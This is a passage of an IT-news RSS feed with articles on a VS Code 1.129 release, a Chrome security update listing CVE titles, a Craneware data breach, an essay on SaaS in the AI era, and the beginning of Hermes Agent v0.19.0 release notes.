<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has released Visual Studio Code 1.129, an update to its free, popular code editor that features a dedicated agent host and an editor panel in the Agents window. The updated editor also allows users to run terminal commands from chat prompts with a <code>!</code>prefix and offers a preview of a modern UI for the workbench.</p>



<p class="wp-block-paragraph">Released July 15, <a href="https://code.visualstudio.com/updates/v1_129" data-type="link" data-id="https://code.visualstudio.com/updates/v1_129">VS Code 1.129</a> can be downloaded from <a href="https://code.visualstudio.com/Download?_exp_download=fb315fc982">code.visualstudio.com</a> for Windows, Linux, and Mac. </p>



<p class="wp-block-paragraph">Microsoft is rearchitecting how agent sessions work in VS Code around the agent host — a dedicated process that runs agent harnesses such as Claude, Copilot, and Codex, based on the <a href="https://microsoft.github.io/agent-host-protocol/" target="_blank" rel="noreferrer noopener">Agent Host Protocol</a> (AHP). Since a session lives in its own process, the same session can be connected to and rendered from multiple VS Code windows at once. The agent host’s Copilot agent is powered by the Copilot SDK, which means that its behavior and functionality is aligned with the Copilot CLI, the standalone GitHub Copilot app, and other Copilot products. The agent host is being rolled out to users in the editor window and the <a href="https://code.visualstudio.com/docs/agents/agents-window">Agents window</a>. It’s enabled through the <code>chat.agentHost.enabled</code> setting. </p>



<p class="wp-block-paragraph">The Agents window shows conversation with an agent next to a detail area for the files and changes it produces. This release introduces a redesigned editor panel that brings the editor and the detail area together into one docked pane with a shared tab bar, so reviewing an agent’s work feels like working in the main editor instead of switching between separate panels.</p>



<p class="wp-block-paragraph">Other new features and improvements in VS Code 1.129:</p>



<ul class="wp-block-list">
<li>Users now can prefix chat messages with a <code>!</code> to run their contents as terminal commands. This works in agent host sessions, both in the editor and in the Agents window.</li>



<li>Developers can now use <a href="https://code.visualstudio.com/docs/agent-customization/language-models#_bring-your-own-language-model-key">Bring Your Own Key (BYOK) models</a> in the Agents window when selecting the Copilot harness running on the agent host.</li>



<li>Developers can preview a modernized VS Code UI that updates the look and feel of the editor workbench. This is currently an experimental feature that can be enabled with the <code>workbench.experimental.modernUI</code><strong> </strong>setting.</li>
</ul>



<p class="wp-block-paragraph">VS Code 1.129 follows <a href="https://www.infoworld.com/article/4196408/visual-studio-code-backs-multi-chat-claude-sessions.html">Visual Studio Code 1.128</a>, released July 13. An update, VS Code 1.129.1, fixes <a href="https://github.com/microsoft/vscode/issues?q=is%3Aissue+is%3Aclosed+milestone%3A1.129.1">three bugs</a> including remote agent hosts failing to start.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 150.0.7871.181/.182 for Windows and Mac and 150.0.7871.181 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the LogSecurity Fixes and RewardsNote: Access to bug details and links may be kept rest...]]></description>
<link>https://tsecurity.de/de/3685018/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685018/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Wed, 22 Jul 2026 01:39:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">The Stable channel has been updated to 150.0.7871.181/.182 for Windows and</span><span color="rgba(0, 0, 0, 0.87)"> </span><span color="rgba(0, 0, 0, 0.87)">Mac and </span></span><span color="rgba(0, 0, 0, 0.87)"><span>150.0.7871.181 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the </span><a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.129..150.0.7871.182?pretty=fuller&amp;n=10000">Log</a></span></p><div><span face="Arial,sans-serif"><br><p dir="ltr"><span>Security Fixes and Rewards</span></p><p dir="ltr"><span>Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.</span></p><br><p dir="ltr"><span>This update includes </span><a href="https://issues.chromium.org/issues?q=customfield1223088:4-M150"><span>12</span></a><span> security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the </span><a href="https://www.chromium.org/Home/chromium-security"><span>Chrome Security Page</span></a><span> for more information.</span></p><br><p dir="ltr"><span>[$500][</span><a href="https://issues.chromium.org/issues/527930356"><span>527930356</span></a><span>]</span><span> High </span><span>CVE-2026-16420: Type Confusion in WebAudio. </span><span>Reported by Found by XBOW and triaged by Brendan Dolan-Gavitt on 2026-06-26</span></p><p dir="ltr"><span>[$500][</span><a href="https://issues.chromium.org/issues/528276487"><span>528276487</span></a><span>]</span><span> High </span><span>CVE-2026-16421: Inappropriate implementation in WebAudio. </span><span>Reported by Found by XBOW and triaged by Brendan Dolan-Gavitt on 2026-06-26</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/517359779"><span>517359779</span></a><span>]</span><span> High </span><span>CVE-2026-16413: Out of bounds write in ANGLE. </span><span>Reported by Google on 2026-05-28</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/517651910"><span>517651910</span></a><span>]</span><span> High </span><span>CVE-2026-16414: Insufficient validation of untrusted input in Chromecast. </span><span>Reported by Google on 2026-05-28</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/519244446"><span>519244446</span></a><span>]</span><span> High </span><span>CVE-2026-16415: Insufficient validation of untrusted input in Extensions. </span><span>Reported by Google on 2026-06-02</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/520172356"><span>520172356</span></a><span>]</span><span> High </span><span>CVE-2026-16416: Integer overflow in Chromecast. </span><span>Reported by Google on 2026-06-05</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/521491024"><span>521491024</span></a><span>]</span><span> High </span><span>CVE-2026-16417: Uninitialized Use in Skia. </span><span>Reported by Google on 2026-06-08</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/522125255"><span>522125255</span></a><span>]</span><span> High </span><span>CVE-2026-16418: Stack buffer overflow in V8. </span><span>Reported by Google on 2026-06-10</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/523435970"><span>523435970</span></a><span>]</span><span> High </span><span>CVE-2026-16419: Out of bounds read and write in ANGLE. </span><span>Reported by Google on 2026-06-13</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/533515002"><span>533515002</span></a><span>]</span><span> High </span><span>CVE-2026-16422: Insufficient validation of untrusted input in Certificate. </span><span>Reported by Google on 2026-07-10</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/534582496"><span>534582496</span></a><span>]</span><span> High </span><span>CVE-2026-16423: Use after free in UI. </span><span>Reported by Google on 2026-07-14</span></p><p dir="ltr"><span>[N/A][</span><a href="https://issues.chromium.org/issues/534858939"><span>534858939</span></a><span>]</span><span> High </span><span>CVE-2026-16424: Use after free in GPU. </span><span>Reported by Google on 2026-07-14</span></p><br><p dir="ltr"><span>We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.</span></p><br><p dir="ltr"><span>Many of our security bugs are detected using </span><a href="https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer"><span>AddressSanitizer</span></a><span>, </span><a href="https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer"><span>MemorySanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer"><span>UndefinedBehaviorSanitizer</span></a><span>, </span><a href="https://www.chromium.org/developers/testing/control-flow-integrity/"><span>Control Flow Integrity</span></a><span>, </span><a href="https://chromium.googlesource.com/chromium/src/+/HEAD/testing/libfuzzer/README.md"><span>libFuzzer</span></a><span>, or </span><a href="https://github.com/google/afl"><span>AFL</span></a><span>.</span></p><br></span></div><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p><p><span><br></span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Craneware Data Breach Exposes Employee and US Healthcare Customer Records]]></title>
<description><![CDATA[Craneware plc (AIM: CRW.L), the Edinburgh-headquartered healthcare financial performance software provider, disclosed on 20 July 2026 that it suffered a cybersecurity incident resulting in unauthorized access to a subset of its data environment. The company, which supplies billing and revenue-cyc...]]></description>
<link>https://tsecurity.de/de/3683734/it-security-nachrichten/craneware-data-breach-exposes-employee-and-us-healthcare-customer-records/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683734/it-security-nachrichten/craneware-data-breach-exposes-employee-and-us-healthcare-customer-records/</guid>
<pubDate>Tue, 21 Jul 2026 14:54:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Craneware plc (AIM: CRW.L), the Edinburgh-headquartered healthcare financial performance software provider, disclosed on 20 July 2026 that it suffered a cybersecurity incident resulting in unauthorized access to a subset of its data environment. The company, which supplies billing and revenue-cycle software to roughly 2,000 US hospitals and nearly 10,000 clinics and retail pharmacies, warned the […]</p>
<p>The post <a href="https://cyberpress.org/craneware-data-breach-exposed/">Craneware Data Breach Exposes Employee and US Healthcare Customer Records</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SaaS will survive, but lazy SaaS is dead]]></title>
<description><![CDATA[Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? 



We already had a secure enterpri...]]></description>
<link>https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683122/ai-nachrichten/saas-will-survive-but-lazy-saas-is-dead/</guid>
<pubDate>Tue, 21 Jul 2026 11:05:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Something interesting happened during an internal evaluation of AI meeting transcription tools at Tungsten Automation. The products worked. They weren’t bad. But sitting across from the pricing, we kept asking the same question: what exactly are we paying for? </p>



<p class="wp-block-paragraph">We already had a secure enterprise AI environment. Building a meeting summary workflow took days, not months. We customized the outputs, injected our own internal context, and controlled security our way instead of working around someone else’s roadmap. We built it. It works better. We own it.</p>



<p class="wp-block-paragraph">That’s not a knock on those vendors. It’s a signal of something more fundamental happening across enterprise software.</p>



<h2 class="wp-block-heading">The moat was never the product</h2>



<p class="wp-block-paragraph">For two decades, <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html" data-type="link" data-id="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">SaaS</a> rode a favorable asymmetry: building internal tools was hard, integrations were messy, and even modest automation required developers and long timelines. Buying was faster and cheaper than building. That asymmetry fueled the explosion of SaaS into every corner of the enterprise stack.</p>



<p class="wp-block-paragraph">AI is collapsing that asymmetry. Large language models and agentic workflows can orchestrate APIs, move data between systems, generate interfaces, and automate business logic with a fraction of the engineering effort required even two years ago. The integration friction that once protected entire product categories is evaporating.</p>



<p class="wp-block-paragraph">The vendors most exposed are not the deeply embedded enterprise platforms. They’re the lightweight workflow layers, the products that essentially put a polished interface on top of accessible data and relatively straightforward processes. Reporting dashboards. Meeting tools. Narrow productivity applications. These products created value by simplifying implementation. That rationale is getting harder to sustain when implementation is no longer the real barrier.</p>



<p class="wp-block-paragraph">Here’s the part most analyses miss: it’s not just that AI makes development faster. It’s that agents change the integration model entirely. For 30 years, enterprise software was built for humans navigating UIs. Agentic systems don’t use UIs. They call <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a>, read from multiple sources simultaneously, and move data freely across systems. The switching costs that once made incumbent software sticky are collapsing, because an agent doesn’t care which UI it used last quarter.</p>



<h2 class="wp-block-heading">The SaaS that survives</h2>



<p class="wp-block-paragraph">The question isn’t whether SaaS survives. It’s which SaaS survives.</p>



<p class="wp-block-paragraph">The companies with durable positions are not the ones with the cleanest interface. They’re the ones that transfer operational risk customers genuinely cannot absorb themselves. Compliance. Regulatory certification. Accumulated domain expertise. Liability.</p>



<p class="wp-block-paragraph">Think about compliant invoicing across 140 countries. That’s not a workflow someone builds in a sprint. The certifications alone take years. A single regulatory change in one jurisdiction can break an AP process for a global enterprise overnight. Customers don’t pay for that capability because it’s technically complex. They pay because they cannot afford to own the risk of getting it wrong.</p>



<p class="wp-block-paragraph">That’s the distinction that matters: AI lowers the cost of building software. It does not lower the cost of absorbing risk. The vendors who understand this are building durable businesses. The ones who don’t are quietly subsidizing their customers’ internal build programs.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability.</p>



<h2 class="wp-block-heading">The prototype trap</h2>



<p class="wp-block-paragraph">The danger for enterprise buyers right now is overcorrection. Every successful prototype looks like a cost-saving opportunity. Very few survive the jump to production.</p>



<p class="wp-block-paragraph">Building a workflow with <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html" data-type="link" data-id="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">generative AI</a> is becoming straightforward. Maintaining it is not. Models evolve. Outputs drift. Governance requirements tighten. What worked cleanly in a controlled environment behaves differently at scale, and the failure mode is worse than traditional software. Rule-based automation, when it fails, fails obviously. Agents fail silently, confidently, at scale, often with a completely reasonable-sounding explanation.</p>



<p class="wp-block-paragraph">Engineering teams that take on AI-powered systems need to solve for observability, model drift, access controls, audit trails, and long-term maintenance ownership. In regulated industries, they need to demonstrate exactly how the system reached every decision. That’s not a weekend project. That’s an ongoing operational commitment that compounds over time as models change and regulatory requirements evolve.</p>



<p class="wp-block-paragraph">Before a team decides to replace an external platform with internal AI tooling, the honest question isn’t, “Can we build this?” The real question is, “Are we prepared to own this in production, for years, as the underlying models change beneath us?” Sometimes the answer is yes. Often the answer is no, and the true cost only becomes visible after the vendor contract is canceled.</p>



<h2 class="wp-block-heading">Build vs. partner: a sharper frame</h2>



<p class="wp-block-paragraph">The build vs. buy framing has always been too binary. The right question is build vs. partner.</p>



<p class="wp-block-paragraph">Partner for the capabilities where risk transfer, regulatory complexity, and domain expertise create genuine value your team cannot replicate. Build for the capabilities that actually differentiate your business from your competitors. Don’t burn your best engineers rebuilding compliant invoice processing or production-grade document extraction. Those aren’t competitive advantages. They’re table stakes, and someone else has already paid the cost, across decades, to make them reliable.</p>



<p class="wp-block-paragraph">The organizations getting this right are honest about where they create unique value. They focus development there, and partner for everything else. The ones getting it wrong are vibe-coding solutions to non-differentiating problems while their actual competitive moat goes unattended.</p>



<h2 class="wp-block-heading">The true value of software</h2>



<p class="wp-block-paragraph">We’re not watching the death of SaaS. We’re watching the end of the friction-based value proposition: the idea that software is worth renewing because integration used to be painful. That rationale is largely gone.</p>



<p class="wp-block-paragraph">What survives is software that does something customers cannot reasonably replicate internally: absorb risk, maintain regulatory compliance, deliver operational reliability at scale, and bring genuine domain expertise into a production-grade system that someone else already stress-tested for years.</p>



<p class="wp-block-paragraph">The vendors who recognize this are already repositioning around accountability, governance, and outcomes. The ones who haven’t will find the next renewal conversation noticeably harder.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability. That distinction is about to separate a lot of winners from a lot of cautionary tales.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.19.0 (2026.7.20) — The Quicksilver Release]]></title>
<description><![CDATA[Hermes Agent v0.19.0 (v2026.7.20)
Release Date: July 20, 2026
Since v0.18.0: ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · ~3,300 issues closed · 450+ community contributors

The Quicksilver Release. Hermes is the messenger god, and this win...]]></description>
<link>https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</guid>
<pubDate>Mon, 20 Jul 2026 20:46:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.19.0 (v2026.7.20)</h1>
<p><strong>Release Date:</strong> July 20, 2026<br>
<strong>Since v0.18.0:</strong> ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · <strong>~3,300 issues closed</strong> · <strong>450+ community contributors</strong></p>
<blockquote>
<p><strong>The Quicksilver Release.</strong> Hermes is the messenger god, and this window we made him move like it. First-turn time-to-first-token dropped <strong>~80% on every platform</strong>, reasoning streams live by default, the desktop app got a ~20-PR speed overhaul (14× faster streaming markdown, virtualized diffs, snappy session switching), and the TUI renders markdown incrementally. Around that speed spine: you can now <strong>manage your Nous subscription without leaving the terminal</strong>, plug <strong>Bitwarden and 1Password</strong> straight into Hermes, let <strong>smart approvals</strong> judge flagged commands for you by default, <strong>watch your subagents work live</strong>, and trust that a finished response <strong>survives a gateway crash</strong> thanks to a durable delivery ledger. This release also rolls up everything from the v0.18.1 and v0.18.2 infrastructure patch tags — those windows are fully documented here.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes got dramatically faster — first token in a fraction of the time</strong> — Cold-start "Initializing agent..." used to eat ~4.3 seconds before your first turn even reached the model; it's now ~0.9s, an ~80% cut that applies to the CLI, gateway, TUI, desktop, and cron alike. Round 2 attacked what you <em>see</em> while waiting: reasoning models now stream their thinking live by default (no more staring at a spinner for 30 seconds), and the response box paints per token instead of per line. If Hermes ever felt like it took a deep breath before answering, that breath is gone. (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The desktop app speed wave — 20+ targeted perf PRs</strong> — Long replies used to cost 14× more CPU in the markdown splitter than they do now; giant diffs froze the review pane until we virtualized it; switching sessions thrashes layout no more. Streaming no longer re-renders the sidebar and every tool row per token, profile backends pre-warm on hover intent, and boot-hidden panes mount at idle instead of on the cold-start critical path. The net effect: the desktop app feels like a native app under load, even with huge transcripts and busy agents. (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a> and more — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Manage your Nous plan from the terminal — <code>/subscription</code> and <code>/topup</code></strong> — Changing your subscription used to mean a trip to the billing website. Now <code>/subscription</code> opens a full flow right in the TUI or classic CLI: see your plan and remaining allowance, preview exactly what an upgrade costs ("Pay $46.30 &amp; upgrade now") or when a downgrade takes effect, and apply it — with scheduled-change banners and undo. The desktop app got a matching billing settings tab. Your wallet never has to leave the keyboard. (<a href="https://github.com/NousResearch/hermes-agent/pull/51639" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51639/hovercard">#51639</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61054/hovercard">#61054</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61067" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61067/hovercard">#61067</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</p>
</li>
<li>
<p><strong>Smart approvals are now the default</strong> — When Hermes wants to run a flagged command, an LLM reviewer now assesses it independently instead of asking you to approve every single one — and each verdict covers only that exact command, so a later command matching the same pattern gets its own review. Combined with the new <strong>user-defined deny rules</strong> (which block commands even under yolo mode) and <code>/deny &lt;reason&gt;</code> (which tells the agent <em>why</em> you refused so it course-corrects), day-to-day approval fatigue drops sharply without giving up control. (<a href="https://github.com/NousResearch/hermes-agent/pull/62661" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62661/hovercard">#62661</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59164/hovercard">#59164</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54518/hovercard">#54518</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Plug your password manager into Hermes — Bitwarden &amp; 1Password secret sources</strong> — API keys no longer have to live in a plaintext <code>.env</code>. A new pluggable <code>SecretSource</code> interface lets Hermes fetch secrets from Bitwarden and 1Password (<code>op://</code> references) at load time, with multiple vaults enabled simultaneously, deterministic precedence, conflict warnings, and per-variable provenance. This consolidated eleven competing community PRs into one orchestrated interface — future vault providers drop in as plugins. (<a href="https://github.com/NousResearch/hermes-agent/pull/59498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59498/hovercard">#59498</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, 1Password provider salvaged from <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>)</p>
</li>
<li>
<p><strong>Watch your subagents work — live transcripts + durable background delegation</strong> — <code>delegate_task</code> dispatches now return live transcript files you can <code>tail -f</code> the moment the subagents launch: every tool call, result, and streamed reply, one human-readable log per child. And background delegation completions are now <strong>durable</strong> — if the process restarts mid-run, results are restored and delivered through an ownership-checked ledger instead of vanishing. Fan out a fleet, watch any worker live, and never lose the results. (<a href="https://github.com/NousResearch/hermes-agent/pull/67479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67479/hovercard">#67479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63494/hovercard">#63494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>A finished answer can no longer be lost — the delivery-obligation ledger</strong> — If the gateway died between generating your response and confirming the platform actually delivered it, that answer used to be silently gone (and you'd paid for the turn). Final responses are now recorded in a durable ledger in <code>state.db</code> around the platform send and <strong>redelivered on the next boot</strong> — closing a P1 silent-loss window for Telegram, Discord, Slack, and every other channel. (<a href="https://github.com/NousResearch/hermes-agent/pull/67181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67181/hovercard">#67181</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>One gateway, many profiles — profile-based message routing</strong> — A single multiplexed gateway sharing one bot token can now route specific guilds, channels, or threads to different profiles — each with fully isolated config, skills, memory, and secrets. Point your work Discord server at the <code>work</code> profile and your hobby server at <code>personal</code>, from one bot. A second multiplex hardening wave means one misconfigured profile can no longer take down the whole gateway. (<a href="https://github.com/NousResearch/hermes-agent/pull/64835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64835/hovercard">#64835</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Burgunthy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Burgunthy">@Burgunthy</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65700" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65700/hovercard">#65700</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60589" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60589/hovercard">#60589</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> + six salvaged contributors)</p>
</li>
<li>
<p><strong>New providers and the newest frontier models</strong> — Fireworks AI and DeepInfra land as first-class providers (Fireworks with cost estimation and a <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3370551446" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2">#2</a> slot in the provider picker), Upstage Solar joins via salvage, and the model catalogs picked up <strong>GPT-5.6 (Sol/Terra/Luna + Pro variants, wired end-to-end across every route)</strong>, <strong>grok-4.5 (GA)</strong>, <strong>moonshotai/kimi-k3</strong>, <strong>claude-fable-5 / claude-sonnet-5</strong>, and GA <strong>tencent/hy3</strong> — plus LM Studio JIT model loading for local setups. (<a href="https://github.com/NousResearch/hermes-agent/pull/62593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62593/hovercard">#62593</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63969/hovercard">#63969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61616/hovercard">#61616</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> completing <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>'s <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4848372503" data-permission-text="Title is private" 